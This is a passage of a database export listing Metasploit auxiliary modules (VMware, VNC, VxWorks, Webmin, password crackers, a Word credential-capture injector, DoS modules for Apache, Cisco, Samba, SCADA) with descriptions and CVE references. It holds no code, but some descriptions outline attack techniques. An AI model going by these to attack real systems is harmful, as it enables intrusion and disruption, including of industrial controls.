00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/vmware/poweron_vm.rb","auxiliary","admin/vmware/poweron_vm","auxiliary/admin/vmware/poweron_vm","VMWare Power On Virtual Machine",300,"This module will log into the Web API of VMWare and try to power on a specified Virtual Machine.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1197,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/vmware/tag_vm.rb","auxiliary","admin/vmware/tag_vm","auxiliary/admin/vmware/tag_vm","VMWare Tag Virtual Machine",300,"This module will log into the Web API of VMWare and 'tag' a specified Virtual Machine. It does this by logging a user event with user supplied text","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1198,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb","auxiliary","admin/vmware/terminate_esx_sessions","auxiliary/admin/vmware/terminate_esx_sessions","VMWare Terminate ESX Login Sessions",300,"This module will log into the Web API of VMWare and try to terminate user login sessions as specified by the session keys.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1199,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb","auxiliary","admin/vnc/realvnc_41_bypass","auxiliary/admin/vnc/realvnc_41_bypass","RealVNC NULL Authentication Mode Bypass",300,"This module exploits an Authentication bypass Vulnerability in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy listener on LPORT and proxies to the target server The AUTOVNC option requires that vncviewer be installed on the attacking machine.","Metasploit Framework License (BSD)","f","2006-05-15 00:00:00",,,"aggressive","t","BID-17978, CVE-2006-2369, OSVDB-25479, URL-http://secunia.com/advisories/20107/","hdm , theLightCosine " 1200,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb","auxiliary","admin/vxworks/apple_airport_extreme_password","auxiliary/admin/vxworks/apple_airport_extreme_password","Apple Airport Extreme Password Extraction (WDBRPC)",300,"This module can be used to read the stored password of a vulnerable Apple Airport Extreme access point. Only a small number of firmware versions have the WDBRPC service running, however the factory configuration was vulnerable. It appears that firmware versions 5.0.x as well as 5.1.x are susceptible to this issue. Once the password is obtained, the access point can be managed using the Apple AirPort utility.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","OSVDB-66842, URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html, US-CERT-VU-362332","hdm " 1201,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb","auxiliary","admin/vxworks/dlink_i2eye_autoanswer","auxiliary/admin/vxworks/dlink_i2eye_autoanswer","D-Link i2eye Video Conference AutoAnswer (WDBRPC)",300,"This module can be used to enable auto-answer mode for the D-Link i2eye video conferencing system. Once this setting has been flipped, the device will accept incoming video calls without acknowledgement. The NetMeeting software included in Windows XP can be used to connect to this device. The i2eye product is no longer supported by the vendor and all models have reached their end of life (EOL).","Metasploit Framework License (BSD)","f",,,,"aggressive","t","OSVDB-66842, URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html, US-CERT-VU-362332","hdm " 1202,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb","auxiliary","admin/vxworks/wdbrpc_memory_dump","auxiliary/admin/vxworks/wdbrpc_memory_dump","VxWorks WDB Agent Remote Memory Dump",300,"This module provides the ability to dump the system memory of a VxWorks target through WDBRPC","Metasploit Framework License (BSD)","f",,,"Download","aggressive","t","OSVDB-66842, URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html, US-CERT-VU-362332","hdm " 1203,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb","auxiliary","admin/vxworks/wdbrpc_reboot","auxiliary/admin/vxworks/wdbrpc_reboot","VxWorks WDB Agent Remote Reboot",300,"This module provides the ability to reboot a VxWorks target through WDBRPC","Metasploit Framework License (BSD)","f",,,"Reboot","aggressive","t","OSVDB-66842, URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html, US-CERT-VU-362332","hdm " 1204,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb","auxiliary","admin/webmin/edit_html_fileaccess","auxiliary/admin/webmin/edit_html_fileaccess","Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access",300,"This module exploits a directory traversal in Webmin 1.580. The vulnerability exists in the edit_html.cgi component and allows an authenticated user with access to the File Manager Module to access arbitrary files with root privileges. The module has been tested successfully with Webim 1.580 over Ubuntu 10.04.","Metasploit Framework License (BSD)","f","2012-09-06 00:00:00",,"Download","aggressive","t","BID-55446, CVE-2012-2983, OSVDB-85247, URL-http://www.americaninfosec.com/research/dossiers/AISG-12-002.pdf, URL-https://github.com/webmin/webmin/commit/4cd7bad70e23e4e19be8ccf7b9f245445b2b3b80","Unknown, juan vazquez " 1205,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/webmin/file_disclosure.rb","auxiliary","admin/webmin/file_disclosure","auxiliary/admin/webmin/file_disclosure","Webmin File Disclosure",300,"A vulnerability has been reported in Webmin and Usermin, which can be exploited by malicious people to disclose potentially sensitive information. The vulnerability is caused due to an unspecified error within the handling of an URL. This can be exploited to read the contents of any files on the server via a specially crafted URL, without requiring a valid login. The vulnerability has been reported in Webmin (versions prior to 1.290) and Usermin (versions prior to 1.220).","Metasploit Framework License (BSD)","f","2006-06-30 00:00:00",,"Download","aggressive","t","BID-18744, CVE-2006-3392, OSVDB-26772, URL-http://secunia.com/advisories/20892/, US-CERT-VU-999601","Matteo Cantoni " 1206,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/zend/java_bridge.rb","auxiliary","admin/zend/java_bridge","auxiliary/admin/zend/java_bridge","Zend Server Java Bridge Design Flaw Remote Code Execution",300,"This module abuses a flaw in the Zend Java Bridge Component of the Zend Server Framework. By sending a specially crafted packet, an attacker may be able to execute arbitrary code. NOTE: This module has only been tested with the Win32 build of the software.","Metasploit Framework License (BSD)","f","2011-03-28 00:00:00",,,"aggressive","t","EDB-17078, OSVDB-71420, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-113/","MC , ikki" 1207,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/analyze/jtr_aix.rb","auxiliary","analyze/jtr_aix","auxiliary/analyze/jtr_aix","John the Ripper AIX Password Cracker",300,"This module uses John the Ripper to identify weak passwords that have been acquired from passwd files on AIX systems.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , theLightCosine " 1208,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/analyze/jtr_crack_fast.rb","auxiliary","analyze/jtr_crack_fast","auxiliary/analyze/jtr_crack_fast","John the Ripper Password Cracker (Fast Mode)",300,"This module uses John the Ripper to identify weak passwords that have been acquired as hashed files (loot) or raw LANMAN/NTLM hashes (hashdump). The goal of this module is to find trivial passwords in a short amount of time. To crack complex passwords or use large wordlists, John the Ripper should be used outside of Metasploit. This initial version just handles LM/NTLM credentials from hashdump and uses the standard wordlist and rules.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1209,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/analyze/jtr_linux.rb","auxiliary","analyze/jtr_linux","auxiliary/analyze/jtr_linux","John the Ripper Linux Password Cracker",300,"This module uses John the Ripper to identify weak passwords that have been acquired from unshadowed passwd files from Unix systems. The module will only crack MD5 and DES implementations by default. Set Crypt to true to also try to crack Blowfish and SHA implementations. Warning: This is much slower.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , theLightCosine " 1210,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/analyze/jtr_mssql_fast.rb","auxiliary","analyze/jtr_mssql_fast","auxiliary/analyze/jtr_mssql_fast","John the Ripper MS SQL Password Cracker (Fast Mode)",300,"This module uses John the Ripper to identify weak passwords that have been acquired from the mssql_hashdump module. Passwords that have been successfully cracked are then saved as proper credentials","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , theLightCosine " 1211,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/analyze/jtr_mysql_fast.rb","auxiliary","analyze/jtr_mysql_fast","auxiliary/analyze/jtr_mysql_fast","John the Ripper MySQL Password Cracker (Fast Mode)",300,"This module uses John the Ripper to identify weak passwords that have been acquired from the mysql_hashdump module. Passwords that have been successfully cracked are then saved as proper credentials","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , theLightCosine " 1212,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/analyze/jtr_oracle_fast.rb","auxiliary","analyze/jtr_oracle_fast","auxiliary/analyze/jtr_oracle_fast","John the Ripper Oracle Password Cracker (Fast Mode)",300,"This module uses John the Ripper to identify weak passwords that have been acquired from the oracle_hashdump module. Passwords that have been successfully cracked are then saved as proper credentials","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , theLightCosine " 1213,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/analyze/jtr_unshadow.rb","auxiliary","analyze/jtr_unshadow","auxiliary/analyze/jtr_unshadow","Unix Unshadow Utility",300,"This module takes a passwd and shadow file and 'unshadows' them and saves them as linux.hashes loot.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1214,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/analyze/postgres_md5_crack.rb","auxiliary","analyze/postgres_md5_crack","auxiliary/analyze/postgres_md5_crack","Postgres SQL md5 Password Cracker",300,"This module attempts to crack Postgres SQL md5 password hashes. It creates hashes based on information saved in the MSF Database such as hostnames, usernames, passwords, and database schema information. The user can also supply an additional external wordlist if they wish.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1215,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/bnat/bnat_router.rb","auxiliary","bnat/bnat_router","auxiliary/bnat/bnat_router","BNAT Router",300,"This module will properly route BNAT traffic and allow for connections to be established to machines on ports which might not otherwise be accessible.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels, URL-https://github.com/claudijd/BNAT-Suite","Jonathan Claudius, bannedit " 1216,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/bnat/bnat_scan.rb","auxiliary","bnat/bnat_scan","auxiliary/bnat/bnat_scan","BNAT Scanner",300,"This module is a scanner which can detect Broken NAT (network address translation) implementations, which could result in a inability to reach ports on remote machines. Typically, these ports will appear in nmap scans as 'filtered'/'closed'.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels, URL-https://github.com/claudijd/BNAT-Suite","Jonathan Claudius , bannedit " 1217,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/client/smtp/emailer.rb","auxiliary","client/smtp/emailer","auxiliary/client/smtp/emailer","Generic Emailer (SMTP)",300,"This module can be used to automate email delivery. This code is based on Joshua Abraham's email script for social engineering.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://spl0it.org/","et " 1218,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/crawler/msfcrawler.rb","auxiliary","crawler/msfcrawler","auxiliary/crawler/msfcrawler","Metasploit Web Crawler",300,"This auxiliary module is a modular web crawler, to be used in conjuntion with wmap (someday) or standalone.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"et " 1219,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/docx/word_unc_injector.rb","auxiliary","docx/word_unc_injector","auxiliary/docx/word_unc_injector","Microsoft Word UNC Path Injector",300,"This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007 and 2010 as of January 2013. In order to get the hashes the auxiliary/server/capture/smb module can be used.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://jedicorp.com/?p=534","SphaZ " 1220,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb","auxiliary","dos/cisco/ios_http_percentpercent","auxiliary/dos/cisco/ios_http_percentpercent","Cisco IOS HTTP GET /%% request Denial of Service",300,"This module triggers a Denial of Service condition in the Cisco IOS HTTP server. By sending a GET request for ""/%%"", the device becomes unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module tested successfully against a Cisco 1600 Router IOS v11.2(18)P.","Metasploit Framework License (BSD)","f","2000-04-26 00:00:00",,,"aggressive","t","BID-1154, CVE-2000-0380, OSVDB-1302, URL-http://www.cisco.com/warp/public/707/cisco-sa-20000514-ios-http-server.shtml","Patrick Webster " 1221,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb","auxiliary","dos/dhcp/isc_dhcpd_clientid","auxiliary/dos/dhcp/isc_dhcpd_clientid","ISC DHCP Zero Length ClientID Denial of Service Module",300,"This module performs a Denial of Service Attack against the ISC DHCP server, versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request message with a 0-length client_id option for an IP address on the appropriate range for the dhcp server. When ISC DHCP Server tries to hash this value it exits abnormally.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2010-2156, EDB-14185, OSVDB-65246","sid, theLightCosine " 1222,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb","auxiliary","dos/freebsd/nfsd/nfsd_mount","auxiliary/dos/freebsd/nfsd/nfsd_mount","FreeBSD Remote NFS RPC Request Denial of Service",300,"This module sends a specially-crafted NFS Mount request causing a kernel panic on host running FreeBSD 6.0.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-16838, CVE-2006-0900, OSVDB-23511, URL-http://lists.immunitysec.com/pipermail/dailydave/2006-February/002982.html","MC " 1223,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/hp/data_protector_rds.rb","auxiliary","dos/hp/data_protector_rds","auxiliary/dos/hp/data_protector_rds","HP Data Protector Manager RDS DOS",0,"This module causes a remote DOS on HP Data Protector's RDS service. By sending a malformed packet to port 1530, _rm32.dll causes RDS to crash due to an enormous size for malloc().","Metasploit Framework License (BSD)","f","2011-01-08 00:00:00",,,"aggressive","t","CVE-2011-0514, EDB-15940, OSVDB-70617","Roi Mallo , sinn3r " 1224,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/http/3com_superstack_switch.rb","auxiliary","dos/http/3com_superstack_switch","auxiliary/dos/http/3com_superstack_switch","3Com SuperStack Switch Denial of Service",300,"This module causes a temporary denial of service condition against 3Com SuperStack switches. By sending excessive data to the HTTP Management interface, the switch stops responding temporarily. The device does not reset. Tested successfully against a 3300SM firmware v2.66. Reported to affect versions prior to v2.72.","Metasploit Framework License (BSD)","f","2004-06-24 00:00:00",,,"aggressive","t","CVE-2004-2691, OSVDB-7246, URL-http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf","patrick " 1225,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/http/apache_mod_isapi.rb","auxiliary","dos/http/apache_mod_isapi","auxiliary/dos/http/apache_mod_isapi","Apache mod_isapi <= 2.2.14 Dangling Pointer",300,"This module triggers a use-after-free vulnerability in the Apache Software Foundation mod_isapi extension. In order to reach the vulnerable code, the target server must have an ISAPI module installed and configured. By making a request that terminates abnormally (either an aborted TCP connection or an unsatisfied chunked request), mod_isapi will unload the ISAPI extension. Later, if another request comes for that ISAPI module, previously obtained pointers will be used resulting in an access violation or potentially arbitrary code execution. Although arbitrary code execution is theoretically possible, a real-world method of invoking this consequence has not been proven. In order to do so, one would need to find a situation where a particular ISAPI module loads at an image base address that can be re-allocated by a remote attacker. Limited success was encountered using two separate ISAPI modules. In this scenario, a second ISAPI module was loaded into the same memory area as the previously unloaded module.","Metasploit Framework License (BSD)","f","2010-03-05 00:00:00",,,"aggressive","t","BID-38494, CVE-2010-0425, EDB-11650, OSVDB-62674, URL-http://www.gossamer-threads.com/lists/apache/cvs/381537, URL-http://www.senseofsecurity.com.au/advisories/SOS-10-002, URL-https://issues.apache.org/bugzilla/show_bug.cgi?id=48509","Brett Gervasoni, jduck " 1226,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/http/apache_range_dos.rb","auxiliary","dos/http/apache_range_dos","auxiliary/dos/http/apache_range_dos","Apache Range header DoS (Apache Killer)",300,"The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, exploit called ""Apache Killer""","Metasploit Framework License (BSD)","f","2011-08-19 00:00:00",,"DOS","aggressive","t","BID-49303, CVE-2011-3192, EDB-17696, OSVDB-74721","Kingcope, Markus Neis , Masashi Fujiwara" 1227,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb","auxiliary","dos/http/apache_tomcat_transfer_encoding","auxiliary/dos/http/apache_tomcat_transfer_encoding","Apache Tomcat Transfer-Encoding Information Disclosure and DoS",300,"Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with ""recycling of a buffer.""","Metasploit Framework License (BSD)","f","2010-07-09 00:00:00",,,"aggressive","t","BID-41544, CVE-2010-2227, OSVDB-66319","Hoagie , Paulino Calderon , Steve Jones" 1228,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/http/dell_openmanage_post.rb","auxiliary","dos/http/dell_openmanage_post","auxiliary/dos/http/dell_openmanage_post","Dell OpenManage POST Request Heap Overflow (win32)",300,"This module exploits a heap overflow in the Dell OpenManage Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability exists due to a boundary error within the handling of POST requests, where the application input is set to an overly long file name. This module will crash the web server, however it is likely exploitable under certain conditions.","Metasploit Framework License (BSD)","f","2004-02-26 00:00:00",,,"aggressive","t","BID-9750, CVE-2004-0331, OSVDB-4077, URL-http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html","patrick " 1229,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/http/hashcollision_dos.rb","auxiliary","dos/http/hashcollision_dos","auxiliary/dos/http/hashcollision_dos","Hashtable Collisions",300,"This module uses a denial-of-service (DoS) condition appearing in a variety of programming languages. This vulnerability occurs when storing multiple values in a hash table and all values have the same hash value. This can cause a web server parsing the POST parameters issued with a request into a hash table to consume hours of CPU with a single HTTP request. Currently, only the hash functions for PHP and Java are implemented. This module was tested with PHP + httpd, Tomcat, Glassfish and Geronimo. It also generates a random payload to bypass some IDS signatures.","Metasploit Framework License (BSD)","f","2011-12-28 00:00:00",,,"aggressive","t","CVE-2011-4858, CVE-2011-4885, CVE-2011-5034, CVE-2011-5035, URL-http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf, URL-http://events.ccc.de/congress/2011/Fahrplan/events/4680.en.html, URL-http://www.nruns.com/_downloads/advisory28122011.pdf, URL-http://www.ocert.org/advisories/ocert-2011-003.html, URL-http://www.youtube.com/watch?v=R2Cq3CLI6H8","Alexander Klink, Christian Mehlmauer , Dan S. Wallach, Julian Waelde, Krzysztof Kotowicz, Scott A. Crosby" 1230,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb","auxiliary","dos/http/novell_file_reporter_heap_bof","auxiliary/dos/http/novell_file_reporter_heap_bof","NFR Agent Heap Overflow Vulnerability",300,"This module exploits a heap overflow in NFRAgent.exe, a component of Novell File Reporter (NFR). The vulnerability occurs when handling requests of name ""SRS"", where NFRAgent.exe fails to generate a response in a secure way, copying user controlled data into a fixed-length buffer in the heap without bounds checking. This module has been tested against NFR Agent 1.0.4.3 (File Reporter 1.0.2).","Metasploit Framework License (BSD)","f","2012-11-16 00:00:00",,,"aggressive","t","CVE-2012-4956, URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959","juan vazquez " 1231,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/http/sonicwall_ssl_format.rb","auxiliary","dos/http/sonicwall_ssl_format","auxiliary/dos/http/sonicwall_ssl_format","SonicWALL SSL-VPN Format String Vulnerability",300,"There is a format string vulnerability within the SonicWALL SSL-VPN Appliance - 200, 2000 and 4000 series. Arbitrary memory can be read or written to, depending on the format string used. There appears to be a length limit of 127 characters of format string data. With physical access to the device and debugging, this module may be able to be used to execute arbitrary code remotely.","Metasploit Framework License (BSD)","f","2009-05-29 00:00:00",,,"aggressive","t","BID-35145, OSVDB-54881, URL-http://www.aushack.com/200905-sonicwall.txt","patrick " 1232,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/http/webrick_regex.rb","auxiliary","dos/http/webrick_regex","auxiliary/dos/http/webrick_regex","Ruby WEBrick::HTTP::DefaultFileHandler DoS",300,"The WEBrick::HTTP::DefaultFileHandler in WEBrick in Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 1.8.7 to 1.8.7-p71, and 1.9 to r18423 allows for a DoS (CPU consumption) via a crafted HTTP request.","Metasploit Framework License (BSD)","f","2008-08-08 00:00:00",,,"aggressive","t","BID-30644, CVE-2008-3656, OSVDB-47471, URL-http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/","kris katterjohn " 1233,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/mdns/avahi_portzero.rb","auxiliary","dos/mdns/avahi_portzero","auxiliary/dos/mdns/avahi_portzero","Avahi < 0.6.24 Source Port 0 DoS",300,"Avahi-daemon versions prior to 0.6.24 can be DoS'd with an mDNS packet with a source port of 0","Metasploit Framework License (BSD)","f","2008-11-14 00:00:00",,,"aggressive","t","CVE-2008-5081, OSVDB-50929","kris katterjohn " 1234,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/misc/dopewars.rb","auxiliary","dos/misc/dopewars","auxiliary/dos/misc/dopewars","Dopewars Denial of Service",300,"The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation.","Metasploit Framework License (BSD)","f","2009-10-05 00:00:00",,,"aggressive","t","BID-36606, CVE-2009-3591, OSVDB-58884","Doug Prostko " 1235,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb","auxiliary","dos/ntp/ntpd_reserved_dos","auxiliary/dos/ntp/ntpd_reserved_dos","NTP.org ntpd Reserved Mode Denial of Service",300,"This module exploits a denial of service vulnerability within the NTP (network time protocol) demon. By sending a single packet to a vulnerable ntpd server (Victim A), spoofed from the IP address of another vulnerable ntpd server (Victim B), both victims will enter an infinite response loop. Note, unless you control the spoofed source host or the real remote host(s), you will not be able to halt the DoS condition once begun!","Metasploit Framework License (BSD)","f","2009-10-04 00:00:00",,,"aggressive","t","BID-37255, CVE-2009-3563, OSVDB-60847, URL-https://support.ntp.org/bugs/show_bug.cgi?id=1331","todb " 1236,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb","auxiliary","dos/pptp/ms02_063_pptp_dos","auxiliary/dos/pptp/ms02_063_pptp_dos","MS02-063 PPTP Malformed Control Data Kernel Denial of Service",300,"This module exploits a kernel based overflow when sending abnormal PPTP Control Data packets to Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers (Remote Access Services). Kernel memory is overwritten resulting in a BSOD. Code execution may be possible however this module is only a DoS.","Metasploit Framework License (BSD)","f","2002-09-26 00:00:00",,,"aggressive","t","BID-5807, CVE-2002-1214, MSB-MS02-063, OSVDB-13422","patrick " 1237,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb","auxiliary","dos/samba/lsa_addprivs_heap","auxiliary/dos/samba/lsa_addprivs_heap","Samba lsa_io_privilege_set Heap Overflow",300,"This module triggers a heap overflow in the LSA RPC service of the Samba daemon.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2007-2446, OSVDB-34699","hdm " 1238,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/samba/lsa_transnames_heap.rb","auxiliary","dos/samba/lsa_transnames_heap","auxiliary/dos/samba/lsa_transnames_heap","Samba lsa_io_trans_names Heap Overflow",300,"This module triggers a heap overflow in the LSA RPC service of the Samba daemon.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2007-2446, OSVDB-34699","hdm " 1239,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb","auxiliary","dos/sap/sap_soap_rfc_eps_delete_file","auxiliary/dos/sap/sap_soap_rfc_eps_delete_file","SAP SOAP EPS_DELETE_FILE File Deletion",300,"This module abuses the SAP NetWeaver EPS_DELETE_FILE function, on the SAP SOAP RFC Service, to delete arbitrary files on the remote file system. The module can also be used to capture SMB hashes by using a fake SMB share as DIRNAME.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","OSVDB-74780, URL-http://dsecrg.com/pages/vul/show.php?id=331, URL-https://service.sap.com/sap/support/notes/1554030","Alexey Sintsov, nmonkee" 1240,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/scada/beckhoff_twincat.rb","auxiliary","dos/scada/beckhoff_twincat","auxiliary/dos/scada/beckhoff_twincat","Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS",300,"The Beckhoff TwinCAT version <= 2.11.0.2004 can be brought down by sending a crafted UDP packet to port 48899 (TCATSysSrv.exe).","Metasploit Framework License (BSD)","f","2011-09-13 00:00:00",,,"aggressive","t","CVE-2011-3486, OSVDB-75495, URL-http://aluigi.altervista.org/adv/twincat_1-adv.txt","Luigi Auriemma, jfa" 1241,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/scada/d20_tftp_overflow.rb","auxiliary","dos/scada/d20_tftp_overflow","auxiliary/dos/scada/d20_tftp_overflow","General Electric D20ME TFTP Server Buffer Overflow DoS",300,"By sending a malformed TFTP request to the GE D20ME, it is possible to crash the device. This module is based on the original 'd20ftpbo.rb' Basecamp module from DigitalBond.","Metasploit Framework License (BSD)","f","2012-01-19 00:00:00",,,"aggressive","t","URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/","K. Reid Wightman , todb " 1242,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/scada/igss9_dataserver.rb","auxiliary","dos/scada/igss9_dataserver","auxiliary/dos/scada/igss9_dataserver","7-Technologies IGSS 9 IGSSdataServer.exe DoS",300,"The 7-Technologies SCADA IGSS Data Server (IGSSdataServer.exe) <= 9.0.0.10306 can be brought down by sending a crafted TCP packet to port 12401. This should also work for version <= 9.0.0.1120, but that version hasn't been tested.","Metasploit Framework License (BSD)","f","2011-12-20 00:00:00",,,"aggressive","t","CVE-2011-4050, OSVDB-77976, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-335-01.pdf","jfa" 1243,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/smtp/sendmail_prescan.rb","auxiliary","dos/smtp/sendmail_prescan","auxiliary/dos/smtp/sendmail_prescan","Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption",300,"This is a proof of concept denial of service module for Sendmail versions 8.12.8 and earlier. The vulnerability is within the prescan() method when parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00 bytes can be used, limiting the likelihood for arbitrary code execution.","Metasploit Framework License (BSD)","f","2003-09-17 00:00:00",,,"aggressive","t","BID-8641, CVE-2003-0694, EDB-24, OSVDB-2577","patrick " 1244,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb","auxiliary","dos/solaris/lpd/cascade_delete","auxiliary/dos/solaris/lpd/cascade_delete","Solaris LPD Arbitrary File Delete",300,"This module uses a vulnerability in the Solaris line printer daemon to delete arbitrary files on an affected system. This can be used to exploit the rpc.walld format string flaw, the missing krb5.conf authentication bypass, or simply delete system files. Tested on Solaris 2.6, 7, 8, 9, and 10.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-14510, CVE-2005-4797, OSVDB-18650, URL-http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1","Optyx , 